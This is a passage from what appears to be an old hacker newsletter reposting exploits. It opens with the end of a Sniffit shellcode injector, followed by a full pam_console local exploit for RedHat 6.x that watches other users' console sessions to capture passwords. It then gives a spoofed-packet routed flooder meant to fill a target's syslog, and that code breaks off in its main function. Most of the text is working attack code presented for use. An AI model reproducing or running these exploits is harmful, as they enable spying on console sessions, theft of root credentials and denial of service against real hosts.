  if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) {
    printf("Can't connect to Sniffit Server\n");
    exit(0);
  }

  printf("Injecting ShellCode ...\n");

  strncat(cmd, "mail from:", 10);
  strncat(cmd, buff, strlen(buff));
  write(sock, cmd, strlen(cmd));

  printf("Done!\n\n");
  return(0);
}
/* www.hack.co.za [10 May]*/

@HWA

267.0 [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
   A vulnerability exists in the pam_console PAM module included as part
   of any Linux system running PAM. pam_console exists to own certain
   devices to users logging in to the console of a Linux machine. It is
   designed to allow only console users to utilize things such as sound
   devices. It will chown devices to users upon logging in, and chown
   them back to being owned by root upon logout. However, as certain
   devices do not have a 'hangup' mechanism, like a tty device, it is
   possible for a local user to continue to monitor activity on certain
   devices after logging out. This could allow a malicious user to sniff
   other users console sessions, and potentially obtain the root password
   if the root user logs in or a user su's to root. They could also
   surreptitiously execute commands as the user on the console.

   Affected: RedHat Linux 6.2, 6.1, 6.0
*/

#include

main(int argc,char*argv[])
{
  char buf[80*24];
  int f=open(argv[1],O_RDWR);

  while (1) {
    lseek(f,0,0);
    read(f,buf,sizeof(buf));
    write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
    write(1,buf,sizeof(buf));
    usleep(10000);
  }
}
/* www.hack.co.za [10 May]*/

@HWA

268.0 [IND] routedsex.c slackware 7 remote dos attack by xt.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      brandon@james.kalifornia.com

/*
   routedsex.c by xt of XOR (brandon@james.kalifornia.com)

   DoS attack against the routed daemon.

   description:
   i noticed a while back, when i was screwing with routed, that RIP
   packets destined for routed (port 520) caused it to log an 'unknown
   router' error to the system log. if i flooded it with the same spoofed
   IP address, it would just say that the last message was logged X times.
   but, if they're randomly spoofed, it logs each one. so this causes a
   DoS attack against the hard drive space of the system. the syslog will
   eventually fill up. run this program a couple of times against a host
   to make the system log fill up even quicker.

   here's an excerpt from the /var/log/syslog file on my system:

   ...
   routed[3067]: packet from unknown router, 45.138.23.14

   and many, many, many more.. 800K file so far after 40 seconds of
   attacking it.

   this has been tested on slackware linux 7.0. should work on all linux,
   may need a couple of tweaks to compile on some distributions, such as
   the ever so crappy RedHat and its clones (i *HATE* redhat).

   anyways, have fun. btw, XOR is looking for more members.. if you're
   interested in joining, read http://xorteam.cjb.net.

   - xt
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* i think i took this line from a syn flooder..
 */
#define ranipbit(a, b) ((rand() % (((b) + 1) - (a))) + (a))

u_short chksum(u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1) {
    sum += *w++;
    nleft -= 1;
  }

  if (nleft == 1) {
    *(u_char *) (&answer) = *(u_char *) w;
    sum += answer;
  }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int dolphin (int sock, struct sockaddr_in *sin, char *rp, int sizerp, u_long source, u_long victim)
{
  struct udphdr udp;
  struct iphdr ip;
  char packet[8092];
  int ret;

  ip.id = htons(31337 + (rand() % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.ihl = 5;
  ip.version = 4;
  ip.tos = 0;
  ip.tot_len = htons(28 + sizerp);
  ip.saddr = source;
  ip.daddr = victim;
  ip.check = chksum((u_short *) &ip, sizeof(ip));

  udp.source = htons(520);
  udp.dest = htons(520);
  udp.len = htons(8 + sizerp);
  udp.check = 0;

  memcpy(packet, (char *) &ip, sizeof(ip));
  memcpy(packet + sizeof(ip), (char *) &udp, sizeof(udp));
  memcpy(packet + sizeof(ip) + sizeof(udp), (char *) rp, sizerp);

  ret = sendto(sock, packet, sizeof(ip) + sizeof(udp) + sizerp, 0,
               (struct sockaddr *) sin, sizeof(struct sockaddr_in));
  return ret;
}

int main(int argc, char **argv)
{
  u_long victim, stop = 0, srcaddr, udelay = 100;
  int sock, dos = 1, riptype = 1;
  struct sockaddr_in sin;
  struct rip rp;
  struct netinfo *neti = rp.rip_nets;
  struct hostent *hp;

  if (argc < 4) {
    fprintf(stderr, "routesex.c by xt of XOR\n");
    fprintf(stderr, "usage: %s